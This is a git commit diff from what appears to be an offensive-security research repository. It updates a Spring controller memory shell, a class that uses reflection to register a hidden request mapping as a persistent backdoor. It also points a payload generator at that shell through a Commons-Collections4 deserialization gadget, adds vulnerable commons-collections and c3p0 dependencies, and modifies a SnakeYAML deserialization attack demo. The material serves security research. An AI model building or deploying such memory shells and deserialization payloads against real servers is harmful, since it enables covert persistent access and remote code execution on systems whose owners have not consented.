update SpringControllerMemShell :)

Author: Whoopsunix

MemShellAndRceEcho/JavaxTomcatDemo/pom.xml

@@ -15,8 +15,8 @@
             <artifactId>tomcat-catalina</artifactId>
             <!--            <version>7.0.59</version>-->
             <!--            <version>7.0.109</version>-->
-            <!--                        <version>8.0.53</version>-->
-            <version>8.5.82</version>
+                                    <version>8.0.53</version>
+<!--            <version>8.5.82</version>-->
             <!--            <version>9.0.65</version>-->
             <!--            <version>10.0.23</version>-->
         </dependency>
@@ -41,12 +41,24 @@
             <artifactId>unboundid-ldapsdk</artifactId>
             <version>3.1.1</version>
         </dependency>
-
         <dependency>
             <groupId>org.apache.commons</groupId>
             <artifactId>commons-collections4</artifactId>
             <version>4.0</version>
         </dependency>
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <!--<version>3.1</version>-->
+            <!--            <version>3.2</version>-->
+            <version>3.2.1</version>
+            <!--            <version>3.2.2</version>-->
+        </dependency>
+        <dependency>
+            <groupId>com.mchange</groupId>
+            <artifactId>c3p0</artifactId>
+            <version>0.9.5.2</version>
+        </dependency>
 
         <dependency>
             <groupId>org.ppp.tools</groupId>

MemShellAndRceEcho/SpringDemo/src/main/java/com/example/memshell/SpringControllerMemShell.java

@@ -46,7 +46,7 @@ public SpringControllerMemShell() {
             List<String> urls = new ArrayList();
             while (urlIterator.hasNext()) {
                 String urlPath = (String) urlIterator.next();
-                if (PATTERN.equals(urlPath)) {
+                if (NAME.equals(urlPath)) {
                     return;
                 }
             }
@@ -57,6 +57,9 @@ public SpringControllerMemShell() {
             configField.setAccessible(true);
             RequestMappingInfo.BuilderConfiguration config = (RequestMappingInfo.BuilderConfiguration)configField.get(mapping);
             RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(new String[]{PATTERN}).options(config).build();
+            Field field1 = requestMappingInfo.getClass().getDeclaredField("name");
+            field1.setAccessible(true);
+            field1.set(requestMappingInfo, NAME);
 
             // 避免循环
             SpringControllerMemShell springControllerMemShell = new SpringControllerMemShell(NAME);

MemShellAndRceEcho/SpringDemo/src/main/java/com/example/utils/PayloadMake.java

@@ -10,7 +10,7 @@
  */
 public class PayloadMake {
     public static void main(String[] args) throws Exception{
-        Class cls = SpringEcho.class;
+        Class cls = SpringControllerMemShell.class;
         CC4Generator cc4Generator = new CC4Generator();
         String payload = cc4Generator.make(cls);
         System.out.println(payload.length());

Serialization/SnakeyamlDemo/src/main/java/com/ppp/AttackDemo.java

@@ -34,6 +34,13 @@ public static void main(String[] args) {
 
 
         Yaml yaml = new Yaml();
-        yaml.load(c3p0Hex);
+        yaml.load(jar);
+
+//        Iterable<Object> objects = yaml.loadAll(jar);
+//        for (Object object : objects) {
+//            System.out.println(object);
+//        }
+
+
     }
 }